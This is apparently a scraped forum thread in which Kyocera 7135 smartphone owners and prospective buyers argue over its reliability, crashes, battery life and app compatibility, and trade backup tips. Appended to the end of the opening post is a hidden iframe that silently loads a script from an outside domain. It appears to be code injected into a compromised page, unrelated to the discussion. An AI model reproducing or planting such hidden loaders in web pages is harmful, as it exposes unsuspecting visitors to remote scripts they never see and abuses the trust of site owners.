+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

This board convinced me not to buy one

I was seriously considering buying the 7135 but after reading some of the threads posted here, forget it. Pictures don't look any better than on a Visor Prism, half of the phones seem to have to be returned because of flaws, poor battery life, multiple crashes. For $500! That's a joke! Maybe in a couple of years the next version of the 7135 will have the bugs ironed out. I'll just buy a new Palm Zire 71 and get a cheap phone with my New Every 2 $100 credit and continue to carry 2 devices. I really wanted to buy this phone but not if it isn't reliable.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: This board convinced me not to buy one

Originally posted by patchs
    I was seriously considering buying the 7135 but after reading some of the threads posted here, forget it.
    As has been said before, people with problems are generally more vocal. And when you ask people here to speak up if they are happy with the 7135 they come out of the woodwork...

http://www.smartphonesource.com/vbul...5325#post65325

http://www.smartphonesource.com/vbul...ight=satisfied
    Please visit my picture site: Robert-O-Rama :)

Re: Re: This board convinced me not to buy one

Originally posted by Robert K.
    As has been said before, people with problems are generally more vocal.
    Exactly. It is human nature. For every negative person there are 100s of quietly satisfied customers.

I was seriously considering buying the 7135 but after reading some of the threads posted here, forget it.
    I think you may be missing some points here. From the little I know about this board, most people keep saying they love the phone but this is what Kyo could do better. Thats very different then saying this phone is a waste of $$. Does it have its glitches, yup but so does a $50k mercedes, cause nothin is perfect. If you dont want one device then I think this is not the product for anyone. I think its great that I can complain about the battery life (big deal, so I had to buy 2 spares) when Im able to surf the web and listen to mp3's on my cell phone, not a bad trade, nope not bad at all!!

Folks,

The great thing about this board is that everyone gets to draw their own conclusions.

My thoughts...

1) If you are not an "early adopter" the 7135 is not for you.

2) If you use a Palm as your main device and use a lot of third party stuff, the 7135 will likely have some problems and dissapoint you.

3) If you can handle the rough edges and want a single unit as a Palm, phone, and MP3 player that you can wear on your belt -- you will like the 7135.

Despite tha long wait -- this phone is still not ready for "primetime" -- there are still way too many quircks.

The latest firmware seems to be pretty good (I posted a thread about this), but today I had 2 freezes after simply ending a call.

The 6035 never did this -- the 7135 still has lots of quirks.

Glenn

Originally posted by glenn_butler

2) If you use a Palm as your main device and use a lot of third party stuff, the 7135 will likely have some problems and dissapoint you.
    That would be me, and no, I'm absolutely thrilled with the 7135. Actually I suspect that if you use a palm and a lot of third party stuff then you've probably blown up your palm more than a few times also.
    These people will probably be happier with a pocket PC smartphone. The trade off is that they will "one size fits all"...
    -Quick

Originally posted by glenn_butler
    I'm a "PDA-first"er, and my experiences also lead me to disagree with this.

If the issue is not being able to use the applications you want: I've loaded tons and tons of apps on here, and only a couple were at all weird, and those I tested, found, and deleted the first day. All the other failures that I've had have been completely my fault; i.e., loading a beta I knew might be dodgy, or accidentally running completely (!) out of memory. The hit ratio is actually much better than on my previous "Palm", a Visor. I think this is the price you pay for having something that's not "just like everything else", i.e., a generic "Palm Pilot". I'll happily pay the price of two non-essential apps not working (which is literally the extent of it for me), for all the benefits of embedded cell phone, SD, etc..

If the issue is power-users "stressing" the unit too much: I know that some people have had trouble with applications, so I can't speak for everybody. However, for me at least, this device really encouraged me to explore new application territory. The first two weeks of ownership (i.e., the entire burn-in period) were an unending sequence of experiments. I wonder if the ratio of failures is really higher for power users, or if the failures we heard about would have happened anyway, at some point? (Since we've heard about one or two of a variety of issues, I'm not sure there is any blanket answer.... Just raising the question for speculation.)

And on the other side of the flip, I wonder if another device, subject to the same barrage of experimentations, might not have had a similar rate of failures, albeit perhaps different ones. Once again, since I don't know of another device that's had this many people sitting around, making up lists of apps and operations to try, for months and months before its release , and buying all their accessories in advance, I'm not sure how to gauge this....

Fully Converged
    I'm working while listening to Enya without having to carry around a bulky CD player. Today I checked my voice messages while on the golf course, checked my email, surfed my ebay auctions, showed my client the pictures of my kids, added a couple of items to my date book, and made a number of phone calls off the voice dialer while tooling down the highway at 75 mph and smoking a nice cuban cigar. Life is good with my 7135! Oh, I also got my text messages with the stock quotes I programmed in through Verizon text messaging (no charge service, btw)

Oh, btw, I sold my 6035 and accessories (not incl. the stowaway keyboard) for $300, so this phone after the new every two discount and my corporate rate with Verizon ended up costing me $84. I can live with that and not lose any sleep.
    From the Middle of the Sea ;-)

Administrator
    this board has pro 7135 users on it so mostly everyone here will be satifisied with the phone as beryl said, but there will be some people who dont want to have to worry about resets, incompatibilities, BSOD's etc.. on a new product. they want it to work out of the box with minimal errors(like the 6035 DID).

so they wait...

i understand the original posters comments and concerns.

Thanks for the comments for my original post. If the phone was say $250, I could tolerate some problems. But at $500, you have great expectations. I visited my Verizon store today, I can get the Motorola T720 for free after trade-in and my New Every Two rebates. With the money I had originally planned to use for the 7135, I can buy the Zire 71 and its 320x320 rez screen for $300.
    To anyone who has the 7135, I wish you the best of luck with it but right now, it's not for me.

After using it for two days just for the way you can navigate with the pen and such makes it a "once you have gone smartphone theres no going back for me"

Dreaderus

With the money I had originally planned to use for the 7135, I can buy the Zire 71 and its 320x320 rez screen for $300.
    The good thing about your decision is that you are still using the Palm OS and can take advantage of a lot of the software we are using. Apparently you can even do wireless email with a GSM phone. Enjoy!

Would someone please tell me how to get my 7135 to crash? I have been unable to do so. I have 1275 contacts going and a very very FULL datebook. I even managed to get the synch to work on the second attempt! (I read the manual second time around).

My only complaint is the battery life. It does not give me a full day of usage. I am going to bet that a bigger LiIon battery is just around the corner. With a fully charged phone and a car lighter adaptor, I can live with this. That is not to say that I am happy.... I hate being told 140 hours standby and getting 14. (Albeit with plenty of talktime and PDA usage).

A cannot imagine returning to life before the 7135. I have tossed:
    1. Old cellphone
    2. Alpha Pager
    3. Palm PDA (It was due for an upgrade to a Tungsten)
    4. Voice memocorder

And although I never had a use for carrying around MP3 players or something to view photos... that's nice to have.

To be honest, when I first read the initial post, I had some very inflattering things to say about "patchs". But then I realized, he was right.

I've had my Kyocera 7135 for over a week now and I have not even "sync'ed" it, let alone added any software to it. After reading some of the posts in this forum, I'm just too scared.

Don't get me wrong, I love my Kyocera. I'm still showing it off and annoting my wife about all its cool features. But the truth be known, I am petrified that this thing is going to crash when I really start using it.

And I am a fairly sophisticated person, technology-wise. Although this is my first palm, I have been a fairly high-level systems and network engineer for over twelve years now. Indeed, I'm usually the first one on the block with the new toys, so I have no fear of the "bleeding edge."

Would I give up my Kyocera or am I thinking about returning it?

Absolutely not!

But I must confess that some of the things written on this forum has made me -- a self-described (and proud) syber-punk and gadget head -- very nervous and cautious.

Maybe we all should consider not just what we are wring but "how: we are writing it. We'd hate it if we were the cause of the market failure of the phone we have all waited for (and loved)
    for so long.

Just a thought and a confession.

William,

You shouldn't be afraid to use it and add stuff to it. First thing you should add is a memory card and a good backup program. Synching it with your computer will backup your files as well in case you have a crash.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Administrator
    Originally posted by mdlampert
    Would someone please tell me how to get my 7135 to crash..
    :eyesroll

certainly your kidding...

dont look a gifted horse in the mouth! if your phone has not had one crash thus far, then you are doing things correct!

keep it up and you will have years of flawless use.

Fully Converged
    William: I agree with Nick. The sync is a backup in case you crash. I have had one fatal reset so far (due to my own stupidity, pushing the limits of downloading a playing a large, high quality video file). I have had 2 soft resets, both due to situations where I was pushing the envelope again.

The sync from the palm desktop restored everything flawlessly from the hard reset. The soft resets didn't mess up anything and no data was lost.
    From the Middle of the Sea ;-)

I have been a fairly high-level systems and network engineer for over twelve years now.
    Ahhh... that would mean that someone else takes care of backups, etc. and all you see are the terminal problems Be analytical about this: insignificant number of phones simply died. Great majority of problems related to 3rd party apps and majority of those evident early on. Of the worse problems most result in a soft reset and *very* few require a hard reset.
    Get an SD card. Get BackupBuddy VFS (even free version). Full backup or restore only takes a couple of min. Its not like this is a critical medical device. Whats to be scared about? Annoyed possibly, but scared?

-Quick

Touche Quick

I'll take your advice.

And please, please, don't let me give anyone the wrong impression. I love my Kyocera 7135.

It's just that some of the things written in this forum can be a little disheartening to the initiated.

William

I was seriously considering buying the 7135 but after reading some of the threads posted here, forget it. Pictures don't look any better than on a Visor Prism, half of the phones seem to have to be returned because of flaws, poor battery life, multiple crashes. For $500! That's a joke! Maybe in a couple of years the next version of the 7135 will have the bugs ironed out. I'll just buy a new Palm Zire 71 and get a cheap phone with my New Every 2 $100 credit and continue to carry 2 devices. I really wanted to buy this phone but not if it isn't reliable.
    This forum is to help those decide on the decision you already made.

A lot of these guys here (including myself) are very happy with the phone. EVERYTHING has it's quirks. We nitpick because this is the place to do it. Just look at other sites such as howardforums.com. There are people complaining about everything there.

Basically, everybody here that complains about their 7135 are satisfied with it.